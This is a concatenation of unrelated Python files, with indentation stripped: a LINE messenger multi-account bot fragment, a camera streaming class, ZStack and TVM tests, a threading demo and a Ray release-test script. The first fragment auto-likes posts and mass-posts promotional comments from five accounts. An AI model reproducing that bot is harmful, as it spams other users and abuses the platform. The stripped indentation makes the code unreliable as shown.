kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Boss"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op))
|
base_camera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@classmethod
def frames(self):
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
# if time.time() - BaseCamera.last_access > 10:
# frames_iterator.close()
# print('Stopping camera thread due to inactivity.')
# break
BaseCamera.thread = None
|
test_migrate_stopped_vm_snapshots_progress.py
|
'''
New Integration test for testing stopped vm migration between hosts.
@author: quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.volume_operations as vol_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import apibinding.inventory as inventory
import threading
import time
import uuid
threads_num = 1
vms = [None] * threads_num
threads = [None] * threads_num
migrate_jobs = [None] * threads_num
threads_result = [None] * threads_num
checker_threads = [None] * threads_num
checker_threads_result = [None] * threads_num
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def migrate_volume(index):
target_host = test_lib.lib_find_random_host(vms[index].get_vm())
vms[index].stop()
sp_option = test_util.SnapshotOption()
sp_option.set_volume_uuid(vms[index].get_vm().allVolumes[0].uuid)
for i in range(0, 50):
sp_option.set_name("snapshot_for_migrate_progress_%s" % (i))
sp = vol_ops.create_snapshot(sp_option)
migrate_jobs[index] = str(uuid.uuid4()).replace('-', '')
print 'shuang %s' % (migrate_jobs[index])
threads_result[index] = "Start"
vol_ops.migrate_volume_apiid(vms[index].get_vm().allVolumes[0].uuid, target_host.uuid, migrate_jobs[index])
threads_result[index] = "Done"
def check_migrate_volume_progress(index):
for i in range(0, 3600):
if migrate_jobs[index] == None:
time.sleep(0.1)
continue
print 'shuang2 %s' % (migrate_jobs[index])
for i in range(0, 3600):
progresses = res_ops.get_progress(migrate_jobs[index])
if len(progresses) > 0:
break
time.sleep(0.1)
if len(progresses) <= 0:
test_util.test_fail("volume not start migrating in 360 seconds")
progress = progresses[0]
if int(progress.content) < 0 or int(progress.content) > 100:
test_util.test_fail("Progress of task should be between 0 and 100, while it actually is %s" % (progress.content))
for i in range(0, 3600):
last_progress = progress
progresses = res_ops.get_progress(migrate_jobs[index])
if len(progresses) <= 0:
break
progress = progresses[0]
if int(progress.content) < int(last_progress.content):
test_util.test_fail("Progress of task (%s) %s is smaller than last time %s" % (migrate_jobs[index], progress.content, last_progress.content))
time.sleep(0.1)
# vms[index].update()
# if vms[index].get_vm().allVolumes[0].status != 'Migrating':
# test_util.test_fail("Volume should be ready when no progress anymore")
vms[index].start()
checker_threads_result[index] = "Done"
def test():
global vms
for i in range(0, threads_num):
vms[i] = test_stub.create_vr_vm('migrate_stopped_vm', 'imageName_net', 'l3VlanNetwork2')
test_obj_dict.add_vm(vms[i])
ps = test_lib.lib_get_primary_storage_by_uuid(vms[i].get_vm().allVolumes[0].primaryStorageUuid)
if ps.type != inventory.LOCAL_STORAGE_TYPE:
test_util.test_skip('Skip test on non-localstorage')
for i in range(0, threads_num):
threads[i] = threading.Thread(target=migrate_volume, args=(i, ))
threads[i].start()
for i in range(0, threads_num):
checker_threads[i] = threading.Thread(target=check_migrate_volume_progress, args=(i, ))
checker_threads[i].start()
for i in range(0, threads_num):
checker_threads[i].join()
threads[i].join()
for i in range(0, threads_num):
if threads_result[i] != "Done":
test_util.test_fail("Exception happened during migrate Volume")
if checker_threads_result[i] != "Done":
test_util.test_fail("Exception happened during check migrate Volume progress")
for i in range(0, threads_num):
vms[i].destroy()
vms[i].expunge()
test_util.test_pass('Migrate Stopped VM progress Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vms
test_lib.lib_error_cleanup(test_obj_dict)
|
test_auto_scheduler_measure.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test measurement and log serialization. """
import json
import multiprocessing
import numpy as np
import tvm
from tvm import topi
from tvm import te, auto_scheduler
import tempfile
import tvm.testing
import pickle
from tvm.testing.auto_scheduler import matmul_auto_scheduler_test
from tvm.auto_scheduler import workload_registry
def record_common(dag, s):
target = tvm.target.Target("llvm")
task = auto_scheduler.SearchTask(compute_dag=dag, workload_key="test", target=target)
inp = auto_scheduler.measure.MeasureInput(task, s)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
# Test in-memory record processing.
record_str = auto_scheduler.measure_record.dump_record_to_string(inp, res)
r_inp, r_res = auto_scheduler.measure_record.load_record_from_string(record_str)
# Only check the workload_key for simplification.
assert inp.task.workload_key == r_inp.task.workload_key
assert str(res) == str(r_res)
# Test file-based record processing.
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
s1 = dag.infer_bound_from_state(s)
s2 = dag.infer_bound_from_state(inputs[0].state)
assert s1 == s2
assert not (s1 == dag.get_init_state())
def test_record_split_reorder_fuse_annotation():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Split
its0 = s.split(C, s[C].iters[0], [4, 8, 8])
its1 = s.split(C, s[C].iters[4], [8, 4, 4])
# Reorder
s.reorder(
C, [its0[0], its1[0], its0[1], its1[1], its0[2], its1[2], its0[3], s[C].iters[8], its1[3]]
)
# Fuse
s.fuse(C, [s[C].iters[0], s[C].iters[1], s[C].iters[2]])
# Parallel
s.parallel(C, s[C].iters[0])
# Thread bind(The blockIdx & threadIdx are used in GPU, just for record testing here)
s.bind(C, s[C].iters[1], "blockIdx.x")
s.bind(C, s[C].iters[2], "threadIdx.z")
s.bind(C, s[C].iters[3], "vthread")
# Unroll
s.unroll(C, s[C].iters[4])
# Vectorize
s.vectorize(C, s[C].iters[6])
record_common(dag, s)
def test_record_compute_at_root_inline_cache_read_write():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
AA = topi.nn.relu(A)
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(AA[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Cache Write
C_shared = s.cache_write(C, "shared")
# Compute At
s.compute_at(C_shared, C, s[C].iters[0])
# Cache Read
B_global = s.cache_read(B, "global", [C_shared])
s.compute_at(B_global, C_shared, s[C_shared].iters[2])
# Compute Inline
s.compute_inline(AA)
# Compute Root
s.compute_root(C_shared)
record_common(dag, s)
def test_record_follow_split_follow_fused_split():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
D = topi.nn.relu(C)
E = topi.nn.relu(D)
dag = auto_scheduler.ComputeDAG([A, B, E])
s = dag.get_init_state()
# Follow Split
s.split(C, s[C].iters[0], [4, 2, 8, 4], True)
split_step0 = len(s.transform_steps) - 1
s.follow_split(C, s[C].iters[5], split_step0, 4)
# Follow Fused Split
its0 = s.split(E, s[E].iters[0], [4, 2, 8, 4], True)
split_step1 = len(s.transform_steps) - 1
its1 = s.split(E, s[E].iters[5], [2, 4, 2, 4], True)
split_step2 = len(s.transform_steps) - 1
its = []
for i0, i1 in zip(its0, its1):
its.append(i0)
its.append(i1)
for i in range(0, 5):
s.fuse(E, [s[E].iters[i], s[E].iters[i + 1]])
s.follow_fused_split(D, s[D].iters[0], [split_step1, split_step2], 2, True)
record_common(dag, s)
def test_record_pragma_storage_align_rfactor():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Rfactor
ko, _ = s.split(C, s[C].iters[2], [16])
s.rfactor(C, ko, 2)
# Pragma
s.pragma(C, s[C].iters[0], "auto_unroll_max_step$64")
# StorageAlign
s.storage_align(C, s[C].iters[-1], 8, 4)
record_common(dag, s)
def test_recover_measure_input():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(correct_inp.task.compute_dag) == str(inp.task.compute_dag)
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp, rebuild_state=True)
assert str(correct_inp.state) == str(inp.state)
def test_workload_dis_factor():
calc = auto_scheduler.utils.calc_workload_dis_factor
decode = auto_scheduler.utils.decode_workload_key
# Identical
target_wkl_key = json.dumps(
["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"]
)
assert calc(decode(target_wkl_key), decode(target_wkl_key)) == 1
# Compatible with a factor
wkl_key = json.dumps(["func1", [1, 3, 112, 112], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == 8 * 2 * 2
# Incompatible argument with zeros
wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [1, 1], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [0, 0], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
# Incompatible non-integter argument
wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "int8"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
# Incompatible function
wkl_key = json.dumps(["func2", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
# Incompatible due to non-dividable factor
wkl_key = json.dumps(["func1", [8, 3, 223, 223], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
def test_measure_local_builder_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
def test_dag_measure_local_builder_runner():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
D = topi.nn.relu(C)
E = topi.nn.relu(D)
tensors = [A, B, E]
dag = auto_scheduler.ComputeDAG(tensors)
key = workload_registry.register_workload_tensors(dag.workload_key(), tensors)
transfer_data = workload_registry.serialize_workload_registry_entry(key)
f_data = pickle.dumps(transfer_data)
f_new = pickle.loads(f_data)
del workload_registry.WORKLOAD_FUNC_REGISTRY[key]
workload_registry.deserialize_workload_registry_entry(f_new)
target = tvm.target.Target("llvm")
task = auto_scheduler.SearchTask(compute_dag=dag, workload_key=key, target=target)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
def test_workload_serialization():
key = tvm.auto_scheduler.utils.get_func_name(matmul_auto_scheduler_test)
transfer_data = workload_registry.serialize_workload_registry_entry(key)
f_data = pickle.dumps(transfer_data)
f_new = pickle.loads(f_data)
del workload_registry.WORKLOAD_FUNC_REGISTRY[key]
workload_registry.deserialize_workload_registry_entry(f_new)
def test_measure_local_builder_rpc_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
rpc_runner = measure_ctx.runner
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = rpc_runner.run([minp], bress)
assert mress[0].error_no == 0
del measure_ctx
def measure_local_builder_rpc_runner_spawn():
assert multiprocessing.get_start_method(False) == "spawn"
test_measure_local_builder_rpc_runner()
@tvm.testing.requires_llvm
def test_measure_local_builder_rpc_runner_spawn():
ctx = multiprocessing.get_context("spawn")
p = ctx.Process(target=measure_local_builder_rpc_runner_spawn)
p.start()
p.join()
@tvm.testing.requires_llvm
def test_measure_target_host():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target=tvm.target.Target("llvm", "llvm -mtriple=aarch64-linux-gnu"),
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
recovered_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(recovered_inp.task.target.host) == str(inp.task.target.host)
@tvm.testing.requires_llvm
def test_measure_special_inputs_map_by_name_local_runner():
@auto_scheduler.register_workload
def foo():
X = te.placeholder(shape=[10], dtype="int32")
Index = te.placeholder(shape=[1], dtype="int32", name="Index")
Y = te.compute((1,), lambda i: X[Index[i]])
return [X, Index, Y]
# This workload cannot use random input for the `Index` input
task = auto_scheduler.SearchTask(
func=foo,
target="llvm",
task_inputs={
"Index": tvm.nd.array(np.array([5], dtype="int32")),
},
)
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(timeout=10)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
@tvm.testing.requires_llvm
def test_measure_special_inputs_map_by_name_rpc_runner():
@auto_scheduler.register_workload
def foo():
X = te.placeholder(shape=[10], dtype="int32")
Index = te.placeholder(shape=[1], dtype="int32", name="Index")
Y = te.compute((1,), lambda i: X[Index[i]])
return [X, Index, Y]
# This workload cannot use random input for the `Index` input
task = auto_scheduler.SearchTask(
func=foo,
target="llvm",
task_inputs={
"Index": tvm.nd.array(np.array([5], dtype="int32")),
},
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
rpc_runner = measure_ctx.runner
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = rpc_runner.run([minp], bress)
assert mress[0].error_no == 0
if __name__ == "__main__":
tvm.testing.main()
|
ShareVariable.py
|
import time, threading
balance = 0
def change_id(n):
global balance
balance = balance + n
# balance = balance - n
def run_thread(n):
for i in range(10):
change_id(i)
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
|
e2e.py
|
"""
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in a s3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
5. Add your test in release/.buildkite/build_pipeline.py.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built ones.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
Make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
Using Compilation on Product + App Config Override
--------------------------------------------------
For quick iteration when debugging a release test, go/compile-on-product allows
you to easily modify and recompile Ray, such that the recompilation happens
within an app build step and can benefit from a warm Bazel cache. See
go/compile-on-product for more information.
After kicking off the app build, you can give the app config ID to this script
as an app config override, where the indicated app config will be used instead
of the app config given in the test config. E.g., running
python e2e.py --test-config ~/ray/benchmarks/benchmark_tests.yaml --test-name=single_node --app-config-id-override=apt_TBngEXXXrhipMXgexVcrpC9i
would run the single_node benchmark test with the apt_TBngEXXXrhipMXgexVcrpC9i
app config instead of the app config given in
~/ray/benchmarks/benchmark_tests.yaml. If the build for the app config is still
in progress, the script will wait until it completes, same as for a locally
defined app config.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
Long running tests
------------------
Long running tests can be kicked off with by adding the --kick-off-only
parameters to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specified the maximum time in seconds that can be passed without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currentl not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def getenv_default(key: str, default: Optional[str] = None):
"""Return environment variable with default value"""
# If the environment variable is set but "", still return default
return os.environ.get(key, None) or default
GLOBAL_CONFIG = {
"ANYSCALE_USER": getenv_default("ANYSCALE_USER",
"release-automation@anyscale.com"),
"ANYSCALE_HOST": getenv_default("ANYSCALE_HOST",
"https://beta.anyscale.com"),
"ANYSCALE_CLI_TOKEN": getenv_default("ANYSCALE_CLI_TOKEN"),
"ANYSCALE_CLOUD_ID": getenv_default(
"ANYSCALE_CLOUD_ID",
"cld_4F7k8814aZzGG8TNUGPKnc"), # anyscale_default_cloud
"ANYSCALE_PROJECT": getenv_default("ANYSCALE_PROJECT", ""),
"RAY_VERSION": getenv_default("RAY_VERSION", "2.0.0.dev0"),
"RAY_REPO": getenv_default("RAY_REPO",
"https://github.com/ray-project/ray.git"),
"RAY_BRANCH": getenv_default("RAY_BRANCH", "master"),
"RELEASE_AWS_BUCKET": getenv_default("RELEASE_AWS_BUCKET",
"ray-release-automation-results"),
"RELEASE_AWS_LOCATION": getenv_default("RELEASE_AWS_LOCATION", "dev"),
"RELEASE_AWS_DB_NAME": getenv_default("RELEASE_AWS_DB_NAME", "ray_ci"),
"RELEASE_AWS_DB_TABLE": getenv_default("RELEASE_AWS_DB_TABLE",
"release_test_result"),
"RELEASE_AWS_DB_SECRET_ARN": getenv_default(
"RELEASE_AWS_DB_SECRET_ARN",
"arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
),
"RELEASE_AWS_DB_RESOURCE_ARN": getenv_default(
"RELEASE_AWS_DB_RESOURCE_ARN",
"arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
),
"RELEASE_RESULTS_DIR": getenv_default("RELEASE_RESULTS_DIR",
"/tmp/ray_release_test_artifacts"),
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str((datetime.datetime.now() +
datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
"EXPIRATION_2D": str((datetime.datetime.now() +
datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
"EXPIRATION_3D": str((datetime.datetime.now() +
datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
"REPORT_RESULT": getenv_default("REPORT_RESULT", ""),
}
